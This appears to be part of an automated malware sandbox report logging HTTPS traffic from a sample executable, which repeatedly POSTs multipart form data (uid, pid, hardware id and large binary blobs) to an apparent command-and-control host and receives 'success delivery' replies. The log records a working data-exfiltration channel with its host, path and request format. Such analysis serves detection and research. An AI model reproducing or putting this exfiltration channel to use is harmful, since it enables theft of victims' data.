                                                            2025-03-25 07:16:41 UTC1369INData Raw: ee 91 9f bd 9e 59 80 48 d3 7f b0 e5 b0 12 1a 7a 2a 16 02 23 4d f3 23 18 4f 2e 04 2e 9a d0 7a cd 48 79 0a 4b 48 49 2c f9 19 0e 2f 0e 44 bc ce 33 ec 33 5b 3c 80 11 94 ce b2 fc 50 a8 bd 09 f8 39 dd e9 93 ea ed d6 54 33 49 55 f7 14 08 9d 80 3b 18 99 5c ef 1d ed 09 bd d7 12 5d 9f 58 1d c4 23 fa 2d ab 30 59 b1 0f 4d 99 15 a4 32 63 87 14 0c 90 32 cb ff c6 c2 72 7a d0 07 5d d2 a3 fd e0 67 ff 87 6e 30 3c a4 9c 8e 70 1b 50 02 d0 3a 13 5b 3a 33 04 3b 91 a2 6b ed cc 6e 40 4b ee f2 43 c9 30 5b 55 49 ec fc 69 19 77 65 1f d8 b7 61 6d 2f 06 30 44 1e a2 85 7a 82 7f b6 d1 17 dd 1b fe 7c f4 fb 56 35 35 ec 7e 03 c6 72 e4 2d f9 ba 6d ad 85 3b fd 20 d7 54 3e 33 46 71 c5 9f 22 9f 82 9e 0d 74 e5 7d 6e 60 40 87 dd 78 01 f9 b0 1a 7d 4c 82 4f 1a 1e 35 1c 5e 21 38 bb 5a 72 14 77 23
                                                            Data Ascii: YHz*#M#O..zHyKHI,/D33[<P9T3IU;\]X#-0YM2c2rz]gn0<pP:[:3;kn@KC0[UIiweam/0Dz|V55~r-m; T>3Fq"t}n`@x}LO5^!8Zrw#
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 6e 8e cc f4 50 25 03 1c e5 53 d2 a5 bc da c9 5e a3 9f 15 11 14 17 40 3d 38 54 1b 72 a0 7c 16 6d f2 14 af 27 10 de 82 a9 35 e8 14 a5 fb 27 39 74 a5 ec e0 24 53 d5 20 9d 14 dd 12 c2 32 7b 77 92 b6 71 41 86 7e cf 76 be bd b7 47 95 18 27 cf b8 5f 3a 26 9a 54 78 91 fb cb 18 3d 60 f4 8f ef 06 d5 ec 2e d3 6b 1e 19 24 a5 8f 60 c1 5b d3 de 71 31 e6 ca 97 65 e1 4c 61 8d 85 b3 4b c0 ce ae 9e aa 0e 57 a7 01 df 8f 2e cf df 7c 0e cf b7 cf 46 d9 e7 e2 db 8d c9 01 72 56 74 9a 7e 3e 92 e3 d3 11 96 1d 13 0d 9a 00 65 72 b7 ff 75 cf 08 d8 76 bf fe a7 2c 8d 6b 45 f6 d7 00 07 bf ec 5f 8b 3e 3d 8d 51 1d 82 fa 97 84 6c 29 87 1a b7 42 7d ae 54 cc 1b f3 75 2b a5 dd c8 42 b1 9d 33 ef 18 81 fb 97 92 f4 56 a0 93 bc 93 bf a8 38 3f dd 5e 84 8d e1 dc 4b ad 7f 35 b6 99 c7 75 f4 35 1c 5d
                                                            Data Ascii: nP%S^@=8Tr|m'5'9t$S 2{wqA~vG'_:&Tx=`.k$`[q1eLaKW.|FrVt~>eruv,kE_>=Ql)B}Tu+B3V8?^K5u5]
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 50 8a 84 59 65 05 74 5d 22 0c ad 2e 8f d6 55 86 15 4b 88 f7 ba ef 9f 3b 9e b0 f7 42 cd 10 eb 8a be 14 e0 be db 24 a5 32 ae 83 a1 82 55 d8 43 c9 2a 80 83 a4 08 b0 21 fd b6 28 66 3a dd cd 66 33 9b 1e 69 9a e7 8d ba c7 09 c7 f6 64 88 47 fc 95 22 86 62 29 4c 92 a6 35 b9 e2 e6 11 08 68 f0 9e 51 e6 a9 f8 e2 68 f0 5e 8f 1e 10 36 49 96 5e 64 6d 7c be e5 3a 7e 56 51 aa 3e 06 74 6d f6 8a c3 00 bd 79 f8 79 36 a0 00 b1 40 06 c3 f7 d8 63 3e 4d cb 92 0a 1f 84 5d 4f 34 c5 ec bd c5 bc 2e 57 64 d9 6a cd 5e 01 04 4e c2 c7 a3 52 ac 60 5d a7 2d d6 81 3c b9 89 76 b4 82 ab 90 ee 85 40 6d 3f bc 1e be be 24 bf 0d 66 81 c5 0f 00 92 7a 2b f8 47 3c 9c be e9 f0 27 fd 89 92 b2 d0 05 8c e2 25 37 19 27 e1 5b ae d7 ba 74 04 d9 8d b4 7c 88 ed fb 78 16 28 58 53 c0 97 27 0b bf ee ac 32 b8
                                                            Data Ascii: PYet]".UK;B$2UC*!(f:f3idG"b)L5hQh^6I^dm|:~VQ>tmyy6@c>M]O4.Wdj^NR`]-<v@m?$fz+G<'%7'[t|x(XS'2
                                                            2025-03-25 07:16:41 UTC1369INData Raw: ce 8e 20 00 f5 29 f5 b4 58 20 40 e6 fc 1b 42 e0 ac 40 0c b0 18 b1 3f 9e ad f9 7f a3 ff 64 23 35 9b 9b d5 4a 76 19 d0 17 dd 64 92 6f 1a 1a 2e b4 68 29 05 2d 1d 72 ee 97 82 1e 7c 01 f8 3f 43 e4 89 86 6e e7 d8 36 8f 88 02 4d 3d e5 4a 17 46 bd 24 90 7a f3 32 2b f5 5b 9d 79 91 09 8d 74 b6 01 b3 3d ec b8 b6 a3 12 0f 8f 4e 9d 42 95 db 12 1c 7f c1 a3 86 02 73 35 7e e7 f8 a1 1d d7 78 d1 c1 41 5c bc 50 8c 8f b7 8e 3d 49 98 c0 e6 46 33 1a 44 c8 6c ed 8b 9b ea cf 30 42 04 33 ed de 07 19 0b fc f8 1b c5 95 60 8d 40 cf 83 f2 48 ee 60 24 3a 8e 70 ed 0a f2 02 7f c4 89 fd 13 3a 17 4b 57 1c 3b 7a a1 c6 fd fb 08 96 00 b2 cd 89 bc 6b 53 7a 4c 90 bc 2f 5c 57 84 40 fa b8 28 24 04 fa a2 5e 68 6b 96 a8 b9 1b ee 65 d9 9a 02 c4 8a 86 ff 9b b9 06 4a 78 55 78 92 78 cf e3 f6 ac a6 3c
                                                            Data Ascii: )X @B@?d#5Jvdo.h)-r|?Cn6M=JF$z2+[yt=NBs5~xA\P=IF3Dl0B3`@H`$:p:KW;zkSzL/\W@($^hkeJxUxx<
                                                            2025-03-25 07:16:41 UTC1369INData Raw: 77 26 e3 86 d2 8b 4b 57 ed 3c 11 54 ec 6c 34 82 4a 8e ad 0d 82 32 d9 f5 db d0 27 d1 f4 2d f7 50 86 a8 6a 2b 39 af 81 b9 a5 86 96 db 82 5e d5 fa 14 cd 1a 30 bd eb 55 66 3b c4 dd ce 81 23 9d c0 79 4d 80 24 97 1f 39 18 99 4a 64 e9 51 20 0c d7 ae 50 8d db c2 aa aa 56 42 75 51 f5 48 a6 06 40 ce 3f e0 19 f5 61 8a 88 36 a1 68 c3 2e a6 73 a8 ed 61 54 26 af 06 32 c8 dc 6a 84 14 b4 08 fa ac 42 fb 01 62 07 e2 4c 6a ee dd 15 ea c9 88 e8 4d 6f 94 bf 0d d5 bc 5a 49 43 0f d4 70 7b dc b1 87 4a 91 0d de 89 ec a3 ec 4d a7 ba 23 d9 6b 0a 4a df 4f a4 bc 9d 1f e4 d0 e0 d4 36 79 a9 6f 1e e2 05 51 e1 ad ef 53 d3 8d a7 93 94 cc 65 d7 0c be ef d1 08 53 4d f8 f8 a0 f6 72 fe 84 77 b1 13 77 96 81 2b e1 60 63 7d 6a 40 8b 97 37 e2 a0 f8 b4 07 a4 28 26 f9 ed 00 d5 b4 9e 9c 0d 93 29 b1
                                                            Data Ascii: w&KW<Tl4J2'-Pj+9^0Uf;#yM$9JdQ PVBuQH@?a6h.saT&2jBbLjMoZICp{JM#kJO6yoQSeSMrww+`c}j@7(&)
                                                            2025-03-25 07:16:41 UTC1369INData Raw: cb ba 45 4d fe 80 22 28 7e 3d 00 9f 41 58 bb 8b d6 99 af d0 f2 1f 70 48 f8 9a eb 96 e9 01 9f f1 39 e2 1a 48 d7 9e 37 c7 2a b1 ce 87 b0 47 45 96 37 17 72 5e 03 ba a0 ae 02 fd 15 9d ac f7 e8 1a 48 c1 44 79 c9 22 fd 0c eb 7c ba 91 ad e0 49 9b 8b 9f 83 15 1d e5 a0 d9 bb 19 ed 2a 2b 41 92 e5 b0 e3 92 60 a9 1c c6 30 7f c9 0f 46 56 d9 9c a1 62 fc 23 46 63 7e d7 bf 68 d1 f7 6b 38 66 31 ca 12 88 a7 80 e0 2a a0 94 09 cd 93 49 f8 5d 93 6e 09 b8 46 c0 97 6e c9 a3 d3 17 7e f9 ed b8 e0 a3 1d 1d 47 f6 e3 43 e5 6d 70 7d 9d 16 cf b3 1b 1a e4 93 66 4d 6c c3 3f 45 c2 c3 a3 46 99 5f 08 b8 7c c5 28 9d b2 f8 70 8e 02 c7 a5 f5 e0 82 bc a2 a0 c3 1d 28 ed 6b 3d 14 3c 3a 80 2a 3c 92 78 aa 93 aa 77 ae b9 bf d1 e5 0e 67 0c 17 df d8 cc 59 5d 8a 97 ff 4b b8 dd 46 16 cf 4d 55 3b c4 51
                                                            Data Ascii: EM"(~=AXpH9H7*GE7r^HDy"|I*+A`0FVb#Fc~hk8f1*I]nFn~GCmp}fMl?EF_|(p(k=<:*<xwgY]KFMU;Q


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.749682104.21.112.14436940C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-25 07:16:42 UTC281OUTPOST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=WdE9K61h266dYShr
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 14498
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:42 UTC14498OUTData Raw: 2d 2d 57 64 45 39 4b 36 31 68 32 36 36 64 59 53 68 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 0d 0a 2d 2d 57 64 45 39 4b 36 31 68 32 36 36 64 59 53 68 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 64 45 39 4b 36 31 68 32 36 36 64 59 53 68 72 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 32 30 46 34 37 37
                                                            Data Ascii: --WdE9K61h266dYShrContent-Disposition: form-data; name="uid"db98bb430160fb366da61dc7445589178b6c4ac86d--WdE9K61h266dYShrContent-Disposition: form-data; name="pid"2--WdE9K61h266dYShrContent-Disposition: form-data; name="hwid"22720F477
                                                            2025-03-25 07:16:43 UTC820INHTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:43 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8f3J91uAb5YaKFnBN7WXEJAOpohGI%2Bygwee0bxNspm%2B%2FDogfEX65IQJnilWDEfZX%2FraNThIoniyb1G58%2FVTAwmTZAijm1bMXX69SOLc%2BxmKA52%2B7U553qj856ApiY2%2FPfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9fd7eb4042ce-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=96476&min_rtt=96376&rtt_var=20493&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15437&delivery_rate=38488&cwnd=245&unsent_bytes=0&cid=5a744fbfa97d2fb6&ts=563&x=0"
                                                            2025-03-25 07:16:43 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                            Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                            2025-03-25 07:16:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.749683104.21.112.14436940C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-25 07:16:43 UTC276OUTPOST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=7nIl8IbbSMd
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 15035
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:43 UTC15035OUTData Raw: 2d 2d 37 6e 49 6c 38 49 62 62 53 4d 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 0d 0a 2d 2d 37 6e 49 6c 38 49 62 62 53 4d 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 6e 49 6c 38 49 62 62 53 4d 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 32 30 46 34 37 37 33 44 44 32 46 38 44 33 38 30 31 35 45 33 30
                                                            Data Ascii: --7nIl8IbbSMdContent-Disposition: form-data; name="uid"db98bb430160fb366da61dc7445589178b6c4ac86d--7nIl8IbbSMdContent-Disposition: form-data; name="pid"2--7nIl8IbbSMdContent-Disposition: form-data; name="hwid"22720F4773DD2F8D38015E30
                                                            2025-03-25 07:16:44 UTC810INHTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:44 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLaLtddRXep6Mf1dD05Gr0f9%2BKXVmYry9wW%2Fe1o9AfZsD4KCvrhGCMU8XX1vmndqRPQy1AbY40mObZgT3aTONfjXXeNxIk82LWT9q8tNgKaTOobBRakRFpn6ELh%2BfvUgcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9fdf1d4cde95-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=96174&min_rtt=95550&rtt_var=20793&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2832&recv_bytes=15969&delivery_rate=38977&cwnd=247&unsent_bytes=0&cid=a2adc8116cb786b9&ts=502&x=0"
                                                            2025-03-25 07:16:44 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                            Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                            2025-03-25 07:16:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.749684104.21.112.14436940C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-25 07:16:45 UTC284OUTPOST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=jOQnh3r5bI1x49WdCM4
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 20400
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:45 UTC15331OUTData Raw: 2d 2d 6a 4f 51 6e 68 33 72 35 62 49 31 78 34 39 57 64 43 4d 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 0d 0a 2d 2d 6a 4f 51 6e 68 33 72 35 62 49 31 78 34 39 57 64 43 4d 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 6a 4f 51 6e 68 33 72 35 62 49 31 78 34 39 57 64 43 4d 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
                                                            Data Ascii: --jOQnh3r5bI1x49WdCM4Content-Disposition: form-data; name="uid"db98bb430160fb366da61dc7445589178b6c4ac86d--jOQnh3r5bI1x49WdCM4Content-Disposition: form-data; name="pid"3--jOQnh3r5bI1x49WdCM4Content-Disposition: form-data; name="hwid"
                                                            2025-03-25 07:16:45 UTC5069OUTData Raw: 35 98 04 3f ba 21 8c e8 16 0d 4d cc be e8 cb 19 c4 88 41 b3 7b b0 89 1c 92 6a f0 a3 ce 11 e2 0f 0f df 88 82 65 9f e8 32 5d b2 fc 1f cd 51 df a1 13 ea 37 7d 74 72 4f 28 51 b6 fe c8 03 be 58 ce 7c 3e 10 05 57 06 35 b9 34 e9 6e 88 1c 6d f5 6a d3 7e d9 cf 7c d1 72 4b 3d 86 1f 9c 23 d9 86 7a 36 43 b6 db 17 31 ba 8c 46 fc bc fa 42 75 30 9c 7e 70 13 2d 6f b0 f8 9c b2 58 af eb 03 f6 67 18 fd d9 9c ae b7 ea 17 e7 eb 73 24 09 cf f8 af e9 e8 ea 1b 5f c2 03 85 33 02 e5 01 48 ce 32 fc 0e 70 90 97 cc 9b 12 3d c4 b5 e2 5d 32 a9 e5 ac 19 34 ef 2e 6f 25 58 0b d3 42 7b 99 78 67 78 88 0a 00 ac 19 94 7a b7 af 1f 4a 6e c2 7b 9c c1 4b 54 89 0a 59 13 b7 f6 e0 67 ed 03 ef 81 f9 7b ca 88 fd 3e 08 ce cb 0e dd 65 75 9a 15 3b da 13 b6 9e b6 9c 93 a5 dd 14 07 3d 74 ed 2b 68 9d 13 14
                                                            Data Ascii: 5?!MA{je2]Q7}trO(QX|>W54nmj~|rK=#z6C1FBu0~p-oXgs$_3H2p=]24.o%XB{xgxzJn{KTYg{>eu;=t+h
                                                            2025-03-25 07:16:45 UTC808INHTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:45 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jfbT%2BBiY%2BCA0LlbvjQym4avDnGlxJaplDq1N1tkEGibbw6RUCajIwsaXIcQ0ddxbESbq2uLJF9nipOXspM53kLRkqnfV0pUYwf5aQEvdwJklJs8Lj8bvhqp1MtcAO1Zg7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9fe5aeaf1b53-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=96480&min_rtt=96402&rtt_var=20371&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21364&delivery_rate=38617&cwnd=246&unsent_bytes=0&cid=32105559971342a2&ts=574&x=0"
                                                            2025-03-25 07:16:45 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                            Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                            2025-03-25 07:16:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.749685104.21.112.14436940C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-25 07:16:47 UTC272OUTPOST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=C3zlAj9M
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 2509
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:47 UTC2509OUTData Raw: 2d 2d 43 33 7a 6c 41 6a 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 0d 0a 2d 2d 43 33 7a 6c 41 6a 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 33 7a 6c 41 6a 39 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 32 30 46 34 37 37 33 44 44 32 46 38 44 33 38 30 31 35 45 33 30 45 35 45 34 35 38 39 39 0d
                                                            Data Ascii: --C3zlAj9MContent-Disposition: form-data; name="uid"db98bb430160fb366da61dc7445589178b6c4ac86d--C3zlAj9MContent-Disposition: form-data; name="pid"1--C3zlAj9MContent-Disposition: form-data; name="hwid"22720F4773DD2F8D38015E30E5E45899
                                                            2025-03-25 07:16:47 UTC818INHTTP/1.1 200 OK
                                                            Date: Tue, 25 Mar 2025 07:16:47 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5RJWBKNxRMOS8h0X7vcZdnXFmP2ZAfYr%2Fnna%2BAj%2Bn8OybKXJ0Ev0zGKjjP1rAVJjvef%2BKaG27LhRYrcSy%2Bz8KxOHPwDDzKx4crllbHy52lVShhh%2FplAtH%2BcHkC2b9J3%2B0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 925c9ff2ca04917b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=97713&min_rtt=96417&rtt_var=21684&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2833&recv_bytes=3417&delivery_rate=38628&cwnd=251&unsent_bytes=0&cid=ecced2235e38954f&ts=365&x=0"
                                                            2025-03-25 07:16:47 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                            Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                            2025-03-25 07:16:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.749686104.21.112.14436940C:\Users\user\Desktop\Qyk8RJnGN7.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-03-25 07:16:48 UTC276OUTPOST /ALosnz HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=t2hEn3p4K2
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                            Content-Length: 552064
                                                            Host: wxayfarer.live
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: 2d 2d 74 32 68 45 6e 33 70 34 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 64 62 39 38 62 62 34 33 30 31 36 30 66 62 33 36 36 64 61 36 31 64 63 37 34 34 35 35 38 39 31 37 38 62 36 63 34 61 63 38 36 64 0d 0a 2d 2d 74 32 68 45 6e 33 70 34 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 74 32 68 45 6e 33 70 34 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 32 30 46 34 37 37 33 44 44 32 46 38 44 33 38 30 31 35 45 33 30 45 35 45
                                                            Data Ascii: --t2hEn3p4K2Content-Disposition: form-data; name="uid"db98bb430160fb366da61dc7445589178b6c4ac86d--t2hEn3p4K2Content-Disposition: form-data; name="pid"1--t2hEn3p4K2Content-Disposition: form-data; name="hwid"22720F4773DD2F8D38015E30E5E
                                                            2025-03-25 07:16:48 UTC15331OUTData Raw: 64 26 8f 4d 77 3c a5 b0 d9 6a b2 35 3a 34 94 2e 14 44 c3 ba b2 38 37 1a 30 83 f0 bb 87 fd f9 b4 60 1f a8 db fe 6b db 5f 41 ef 80 29 4e 3b 1e 62 4c 46 3d c6 c7 c8 bd 71 e3 d5 2a b1 85 55 ed 9f 0a 38 b9 83 56 0b f6 c2 4f 40 41 f2 71 61 7b 36 ac 9b 38 a2 04 40 c8 d3 d0 65 c0 27 99 1c 69 20 e9 13 83 16 37 c0 61 26 68 54 4c ef 94 65 d2 b9 0d 2a c6 f1 ad 33 96 f2 43 5f 39 6b 39 37 97 eb ad 1c f0 93 f9 2f c9 60 c2 2a 73 5c c6 54 15 26 df 2e 6b bb df 2b e0 41 76 7a eb 8a fe 59 57 19 02 c1 84 55 a6 35 ed 57 d9 ce 3f 08 73 a8 3e 5b 86 4d eb 40 fe b2 fb 3c 2c 7d 8e e0 99 c2 0b 70 41 74 ed 76 99 6a 9a ee eb 63 a9 c4 cf 50 12 c7 14 43 9c 77 51 7c 73 1f 6b 24 ba 5f 44 54 46 15 84 17 37 26 88 16 b7 54 75 d3 71 46 8f 3a e2 ae c5 61 df 03 f4 2d 2a 97 35 f0 9f e9 7d ba 24
                                                            Data Ascii: d&Mw<j5:4.D870`k_A)N;bLF=q*U8VO@Aqa{68@e'i 7a&hTLe*3C_9k97/`*s\T&.k+AvzYWU5W?s>[M@<,}pAtvjcPCwQ|sk$_DTF7&TuqF:a-*5}$
